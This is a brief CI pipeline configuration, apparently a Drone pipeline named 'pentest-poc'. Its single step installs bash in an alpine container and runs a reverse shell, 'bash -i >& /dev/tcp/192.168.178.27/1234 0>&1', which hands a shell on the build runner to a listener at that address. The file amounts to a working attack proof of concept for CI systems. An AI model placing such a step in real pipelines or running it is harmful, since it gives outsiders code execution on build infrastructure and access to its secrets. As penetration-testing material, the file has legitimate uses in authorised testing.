kind: pipeline type: docker name: pentest-poc steps: - name: poc image: alpine:latest commands: - apk add --no-cache bash - bash -i >& /dev/tcp/192.168.178.27/1234 0>&1